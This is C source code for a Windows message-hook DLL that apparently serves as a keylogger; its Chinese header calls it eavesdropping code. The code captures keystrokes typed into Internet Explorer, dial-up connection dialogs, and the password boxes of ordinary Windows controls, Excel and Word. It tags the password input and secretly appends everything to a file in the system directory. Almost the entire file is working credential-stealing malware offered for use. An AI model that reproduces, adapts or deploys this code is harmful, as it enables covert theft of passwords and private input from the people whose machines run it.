hook.c

listen to what are they talking,窃听源码

/* hook.c:
   可以将所有在IEFrame和拨号网络中的输入记录下来.
   http://www.nease.net/~inetsoft
   by lgd/Paladin.InetSoft GuangZhou
*/
#include <windows.h>
#include <stdio.h>

static HWND ghwndSpyHook = NULL;

LRESULT CALLBACK SpyGetMsgProc(INT hc, WPARAM wParam, LPARAM lParam);
LRESULT CALLBACK SpyCallWndProc(INT hc, WPARAM wParam, LPARAM lParam);

int PutChar(unsigned char ch)
{
	char temp[128];
	FILE *fp;

	GetSystemDirectory(temp, sizeof(temp)-20);
	strcat(temp, "\\user.txt");
	//strcpy(temp, "user");
	fp =fopen(temp, "a");
	if(fp ==NULL) fp=fopen(temp, "w");
	if(fp ==NULL) return 0L;
	fwrite(&ch, 1, 1, fp);
	fclose(fp);
	return 0;
}

BOOL APIENTRY DllMain(PVOID hModule, ULONG ulReason, PCONTEXT pctx)
{
    UNREFERENCED_PARAMETER(hModule);
    UNREFERENCED_PARAMETER(pctx);

    if ( ulReason == DLL_PROCESS_ATTACH ) {
    }

    return TRUE;
}

static int FindIEWindow(VOID)
{
	char temp[200];
	HWND hwnd, hwndFrame;

	hwnd =GetForegroundWindow();
	if(hwnd ==NULL) return 0L;
	GetClassName(hwnd, temp, sizeof(temp));
	if(strcmp(temp, "IEFrame"))
	{
		ghwndSpyHook =NULL;
		return 0;
	}
	hwndFrame =hwnd;
	hwnd =GetWindow(hwndFrame, GW_CHILD);
	while(hwnd !=NULL)
	{
		GetClassName(hwnd, temp, sizeof(temp));
		if(!strcmp(temp, "Shell DocObject View"))
			break;
		hwnd =GetWindow(hwnd, GW_HWNDNEXT);
	}
	if(hwnd ==NULL) {hwndFrame =NULL; return 0L;}
	hwnd =GetWindow(hwnd, GW_CHILD);
	if(hwnd !=NULL)
		ghwndSpyHook =hwnd;
}

HWND GetTopParent(HWND hWnd)
{
	HWND hwnd;

	if(hWnd ==NULL) return FALSE;
	hwnd =hWnd;
	while(hwnd !=NULL)
	{
		hWnd =hwnd;
		hwnd =GetParent(hWnd);
	}
	return hWnd;
}

BOOL IsIEFrame(HWND hWnd)
{
	char temp[100];

	GetClassName(hWnd, temp, sizeof(temp));
	if(!strcmp(temp, "IEFrame"))
		return TRUE;
	return FALSE;
}

BOOL IsDialFrame(HWND hWnd)
{
	char temp[100];

	GetWindowText(hWnd, temp, sizeof(temp));
	if(!strncmp(temp, "连接到", 6))
		return TRUE;
	else return FALSE;
}

int IsPassInput(HWND hWnd)
{
	char temp[100];
	LONG l;

	l =GetWindowLong(hWnd, GWL_STYLE);
	if(l & ES_PASSWORD)   // 普通密码输入框
		return 1;

	GetClassName(hWnd, temp, sizeof(temp));  // Excel密码输入框
	if(!strcmp(temp, "EDTBX"))
		return 2;
	if(!strcmp(temp, "RichEdit20W") && (l & WS_SYSMENU))  // Word密码输入框
		return 3;

	return FALSE;
}

BOOL WINAPI HookProc(HWND hwnd, UINT uiMessage, WPARAM wParam, LPARAM lParam)
{
	HWND hWnd;
	int ret;

	if(uiMessage ==WM_CHAR || uiMessage ==WM_IME_CHAR)
	{
		hWnd =GetTopParent(hwnd);
		if(IsIEFrame(hWnd))
		{
			if(uiMessage ==WM_IME_CHAR)
				PutChar((unsigned char)(wParam>>8));
			PutChar((unsigned char)wParam);
	        return TRUE;
		}
		else if(IsDialFrame(hWnd))
		{
			PutChar('@');    // 拨号密码
			if(uiMessage ==WM_IME_CHAR)  // 汉字
				PutChar((unsigned char)(wParam>>8));
			PutChar((unsigned char)wParam);
	        return TRUE;
		}
		else if((ret =IsPassInput(hwnd)))
		{
			if(ret ==1) PutChar('*');
			else if(ret ==2) PutChar('%');
			else PutChar('~');

			if(uiMessage ==WM_IME_CHAR)
				PutChar((unsigned char)(wParam>>8));
			PutChar((unsigned char)wParam);
	        return TRUE;
		}
    }

    return FALSE;
}

LRESULT CALLBACK SpyGetMsgProc(INT hc, WPARAM wParam, LPARAM lParam)
{
    PMSG pmsg;

    pmsg = (PMSG)lParam;

    if (hc >= 0 && pmsg && pmsg->hwnd)
    {
        return HookProc(pmsg->hwnd, pmsg->message, pmsg->wParam, pmsg->lParam);
    }

    return CallNextHookEx(NULL, hc, wParam, lParam);
}

LRESULT CALLBACK SpyCallWndProc(INT hc, WPARAM wParam, LPARAM lParam)
{
    PCWPSTRUCT pcwps;

    pcwps = (PCWPSTRUCT)lParam;

    if (hc >= 0 && pcwps && pcwps->hwnd)
    {
        return HookProc(pcwps->hwnd, pcwps->message, pcwps->wParam, pcwps->lParam);
    }

    return CallNextHookEx(NULL, hc, wParam, lParam);
}